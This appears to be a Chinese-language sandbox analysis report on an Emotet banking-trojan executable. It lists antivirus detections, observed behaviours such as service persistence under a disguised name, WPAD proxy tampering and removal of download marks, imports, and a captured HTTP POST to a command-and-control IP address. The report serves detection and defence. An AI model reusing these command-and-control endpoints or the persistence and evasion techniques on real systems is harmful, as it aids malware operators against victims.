11.4
0-day
58 个模型检测该样本为恶意!
重新分析
更多

3975b726fe697572122e18d1fff000a7ea3606bdf64d521448e7e7fac3f0f3dd

c531959b120a5197f3a692f204ea54f1.exe

分析耗时

123s

最近分析

文件大小

92.0KB
静态报毒 动态报毒 100% AI SCORE=85 AIDETECTVM ATTRIBUTE BANKERX BSCOPE CLASSIC CONFIDENCE DKADF DOWNLOADER33 EJQB ELDORADO EMOTET EMOTETU ENCPK FQ0@AWYDO3KI FQ0@BWYDO3KI GENCIRC GENKRYPTIK HDZF HIGH CONFIDENCE HIGHCONFIDENCE HLCZVX KRYPTIK MALWARE1 MALWARE@#38Q5WAB6N0DHX R + MAL RNBNI61JWZK SCORE SMTHC SUSGEN UNSAFE ZENPAK ZEXAF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Emotet.b5e0b084 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:BankerX-gen [Trj] 20201228 21.1.5827.0
Tencent Malware.Win32.Gencirc.10b9ec79 20201228 1.0.0.1
Kingsoft 20201228 2017.9.26.565
McAfee Emotet-FQU!C531959B120A 20201228 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619942166.80725
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 个事件)
Time & API Arguments Status Return Repeated
1619942156.16725
CryptGenKey
crypto_handle: 0x00567f70
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00567108
flags: 1
key: f %á‘véè3AthoX
success 1 0
1619942166.87025
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤éºM—J«›Ä"ªoš§ò!.ÑYtúÏrïøÜ|¯b¦1°Tz´+û̧¢œ&Þ#¾T…×ÔæéQp;5ã$¹nXÖ2 Û?Qᘠ²H&‡æ§ÎÄt¡D< a6Ÿ<
blob_type: 1
flags: 64
success 1 0
1619942192.27625
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤æk™³Åa°qèΧrszj2uÙ=ý38uûÌN* ddšÜ‡ú´œ$»†÷»µºÚ—Ó5z¤n»@F;ÉhÞç ‹8«7¯ñ,#ã!øAq˜Ë¨z8&hŽ_”nÙGÚWpÂiÍ
blob_type: 1
flags: 64
success 1 0
1619942196.40125
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤Ë2£™Þ{$îçÁÑù½y^)ÄÏ ãf_¥cºý+Û.ÿZ<˜0-JB\¥D‘¸ Gž+_¤™r\À>¨XçTÿÜâåëÛ}séÇåÁpšŸ@J¬É×/&u¸
blob_type: 1
flags: 64
success 1 0
1619942199.97925
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤·tò6rÁ5·´ŽpŠücÙ۝KÖÕânGæjl9Z]¾eÅ Ëy,$¡À{¾w1ºõŒP°z{4hÁL™ƒ…é˜@•­ç´+òVŽz®‹Ð5^aeÞ¸a©L[ñ×Ù
blob_type: 1
flags: 64
success 1 0
1619942222.72925
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤åÊབƋûLÊäû‰Á!ÜÀ×õ…»oZqӒ™bΫ|8¾IÃnëPoݽ<ß÷Ç8 –l¥ÀØæ­U1녨×z7FC~Yf)t¨¨~Æ^x> ¨V -s|$+X™É
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features Connection to IP address suspicious_request POST http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
Performs some HTTP requests (1 个事件)
request POST http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
Sends data using the HTTP POST Method (1 个事件)
request POST http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619942135.713
NtAllocateVirtualMemory
process_identifier: 2632
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02070000
success 0 0
1619942193.71325
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000003e70000
success 0 0
1619942144.13525
NtAllocateVirtualMemory
process_identifier: 1464
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00480000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Public\Desktop\Google Chrome.lnk
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619942139.213
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c531959b120a5197f3a692f204ea54f1.exe
newfilepath: C:\Windows\SysWOW64\winbio\winbio.exe
newfilepath_r: C:\Windows\SysWOW64\winbio\winbio.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c531959b120a5197f3a692f204ea54f1.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619942167.26025
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.390698492591588 section {'size_of_data': '0x0000d000', 'virtual_address': '0x0000a000', 'entropy': 7.390698492591588, 'name': '.rsrc', 'virtual_size': '0x0000c800'} description A section with a high entropy has been found
entropy 0.5909090909090909 description Overall entropy of this PE file is high
Expresses interest in specific running processes (1 个事件)
process winbio.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619942166.99525
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (6 个事件)
host 124.150.175.133
host 139.59.12.63
host 172.217.24.14
host 186.80.169.128
host 190.63.7.166
host 51.38.134.203
Installs itself for autorun at Windows startup (1 个事件)
service_name winbio service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\winbio\winbio.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619942143.26
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x002e3930
display_name: winbio
error_control: 0
service_name: winbio
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\winbio\winbio.exe"
filepath_r: "C:\Windows\SysWOW64\winbio\winbio.exe"
service_manager_handle: 0x002ec538
desired_access: 2
service_type: 16
password:
success 3029296 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619942169.80725
RegSetValueExA
key_handle: 0x00000380
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000380
value: ð՝(?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000380
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619942169.80725
RegSetValueExW
key_handle: 0x00000380
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000398
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000398
value: ð՝(?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000398
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619942169.80725
RegSetValueExW
key_handle: 0x0000037c
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\winbio\winbio.exe:Zone.Identifier
File has been identified by 58 AntiVirus engines on VirusTotal as malicious (50 out of 58 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.EmotetU.Gen.fq0@bWydO3ki
FireEye Generic.mg.c531959b120a5197
CAT-QuickHeal Backdoor.Emotet
ALYac Trojan.EmotetU.Gen.fq0@bWydO3ki
Cylance Unsafe
K7AntiVirus Trojan ( 005600261 )
Alibaba Trojan:Win32/Emotet.b5e0b084
K7GW Trojan ( 005600261 )
Cybereason malicious.b120a5
Arcabit Trojan.EmotetU.Gen.E3BBA2
Cyren W32/Emotet.AKM.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Malware.Emotet-7755663-0
Kaspersky Backdoor.Win32.Emotet.gea
BitDefender Trojan.EmotetU.Gen.fq0@bWydO3ki
NANO-Antivirus Trojan.Win32.Kryptik.hlczvx
Paloalto generic.ml
AegisLab Trojan.Win32.Emotet.L!c
Tencent Malware.Win32.Gencirc.10b9ec79
Ad-Aware Trojan.EmotetU.Gen.fq0@bWydO3ki
Sophos Mal/Generic-R + Mal/EncPk-APM
Comodo Malware@#38q5wab6n0dhx
F-Secure Trojan.TR/AD.Emotet.dkadf
DrWeb Trojan.DownLoader33.38016
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.SMTHC.hp
McAfee-GW-Edition BehavesLike.Win32.Emotet.nh
MaxSecure Trojan.Malware.74690904.susgen
Emsisoft Trojan.EmotetU.Gen.fq0@bWydO3ki (B)
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.ec
Webroot W32.Trojan.Emotet
Avira TR/AD.Emotet.dkadf
MAX malware (ai score=85)
Antiy-AVL Trojan[Backdoor]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
ViRobot Trojan.Win32.Agent.90112.GM
ZoneAlarm Backdoor.Win32.Emotet.gea
GData Trojan.EmotetU.Gen.fq0@bWydO3ki
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.Generic.C4097924
McAfee Emotet-FQU!C531959B120A
VBA32 BScope.Trojan.Zenpak
Malwarebytes Trojan.Emotet
ESET-NOD32 a variant of Win32/Kryptik.HDZF
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMTHC.hp
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 个事件)
dead_host 172.217.160.110:443
dead_host 192.168.56.101:49190
dead_host 172.217.24.14:443
dead_host 186.80.169.128:80
dead_host 192.168.56.101:49191
dead_host 190.63.7.166:8080
dead_host 124.150.175.133:8080
dead_host 51.38.134.203:8080
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-04-30 23:16:10

Imports

Library MFC42.DLL:
0x406058
0x40605c
0x406060
0x406064
0x406068
0x40606c
0x406070
0x406074
0x406078
0x40607c
0x406080
0x406084
0x406088
0x40608c
0x406090
0x406094
0x406098
0x40609c
0x4060a0
0x4060a4
0x4060a8
0x4060ac
0x4060b0
0x4060b4
0x4060b8
0x4060bc
0x4060c0
0x4060c4
0x4060c8
0x4060cc
0x4060d0
0x4060d4
0x4060d8
0x4060dc
0x4060e0
0x4060e4
0x4060e8
0x4060ec
0x4060f0
0x4060f4
0x4060f8
0x4060fc
0x406100
0x406104
0x406108
0x40610c
0x406110
0x406114
0x406118
0x40611c
0x406120
0x406124
0x406128
0x40612c
0x406130
0x406134
0x406138
0x40613c
0x406140
0x406144
0x406148
0x40614c
0x406150
0x406154
0x406158
0x40615c
0x406160
0x406164
0x406168
0x40616c
0x406170
0x406174
0x406178
0x40617c
0x406180
0x406184
0x406188
0x40618c
0x406190
0x406194
0x406198
0x40619c
0x4061a0
0x4061a4
0x4061a8
0x4061ac
0x4061b0
0x4061b4
0x4061b8
0x4061bc
0x4061c0
0x4061c4
0x4061c8
0x4061cc
0x4061d0
0x4061d4
0x4061d8
0x4061dc
0x4061e0
0x4061e4
0x4061e8
0x4061ec
0x4061f0
0x4061f4
0x4061f8
0x4061fc
0x406200
0x406204
0x406208
0x40620c
0x406210
0x406214
0x406218
0x40621c
0x406220
0x406224
0x406228
0x40622c
0x406230
0x406234
0x406238
0x40623c
0x406240
0x406244
0x406248
0x40624c
0x406250
0x406254
0x406258
0x40625c
0x406260
0x406264
0x406268
0x40626c
0x406270
0x406274
0x406278
0x40627c
0x406280
0x406284
0x406288
0x40628c
0x406290
0x406294
0x406298
0x40629c
0x4062a0
0x4062a4
0x4062a8
0x4062ac
0x4062b0
0x4062b4
0x4062b8
0x4062bc
0x4062c0
0x4062c4
0x4062c8
0x4062cc
0x4062d0
0x4062d4
0x4062d8
0x4062dc
0x4062e0
0x4062e4
0x4062e8
0x4062ec
0x4062f0
0x4062f4
0x4062f8
0x4062fc
0x406300
0x406304
0x406308
0x40630c
0x406310
0x406314
0x406318
0x40631c
0x406320
0x406324
0x406328
0x40632c
0x406330
0x406334
0x406338
0x40633c
0x406340
0x406344
0x406348
0x40634c
0x406350
0x406354
0x406358
0x40635c
0x406360
0x406364
0x406368
0x40636c
0x406370
0x406374
0x406378
0x40637c
0x406380
0x406384
0x406388
0x40638c
0x406390
0x406394
0x406398
0x40639c
0x4063a0
0x4063a4
0x4063a8
0x4063ac
0x4063b0
0x4063b4
0x4063b8
0x4063bc
0x4063c0
0x4063c4
0x4063c8
0x4063cc
0x4063d0
0x4063d4
0x4063d8
0x4063dc
0x4063e0
0x4063e4
0x4063e8
0x4063ec
0x4063f0
0x4063f4
0x4063f8
0x4063fc
0x406400
0x406404
0x406408
0x40640c
0x406410
0x406414
0x406418
0x40641c
0x406420
0x406424
0x406428
0x40642c
Library MSVCRT.dll:
0x406464 __CxxFrameHandler
0x406468 __setusermatherr
0x40646c _adjust_fdiv
0x406470 __p__commode
0x406474 __p__fmode
0x406478 __set_app_type
0x40647c _except_handler3
0x406480 _initterm
0x406484 __getmainargs
0x406488 _acmdln
0x40648c exit
0x406490 _XcptFilter
0x406494 _exit
0x406498 _onexit
0x40649c __dllonexit
0x4064a0 _ftol
0x4064a4 _purecall
0x4064a8 memmove
0x4064ac time
0x4064b0 srand
0x4064b4 rand
0x4064b8 printf
0x4064bc _setmbcp
0x4064c0 _controlfp
Library KERNEL32.dll:
0x40603c GetStartupInfoA
0x406040 GetModuleHandleA
0x406044 LoadLibraryExW
0x406048 FindResourceA
0x40604c SizeofResource
0x406050 LoadResource
Library USER32.dll:
0x4064c8 GrayStringA
0x4064cc DrawTextA
0x4064d0 TabbedTextOutA
0x4064d4 KillTimer
0x4064d8 PtInRect
0x4064dc SetTimer
0x4064e0 InvalidateRect
0x4064e4 GetClientRect
0x4064e8 EnableWindow
0x4064ec UpdateWindow
0x4064f0 GetWindowTextA
Library GDI32.dll:
0x406000 GetMapMode
0x406004 Escape
0x406008 ExtTextOutA
0x40600c TextOutA
0x406010 RectVisible
0x406014 PtVisible
0x406018 BitBlt
0x406020 LPtoDP
0x406024 CreateCompatibleDC
0x406028 GetBkColor
0x40602c DPtoLP
0x406030 GetViewportExtEx
0x406034 GetWindowExtEx
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49196 139.59.12.63 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/ 
POST /ay8diMN/xkmsAPit2smEyZDkd/ HTTP/1.1
Referer: http://139.59.12.63/ay8diMN/xkmsAPit2smEyZDkd/
Content-Type: multipart/form-data; boundary=---------------------------772117366375087
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 139.59.12.63:8080
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.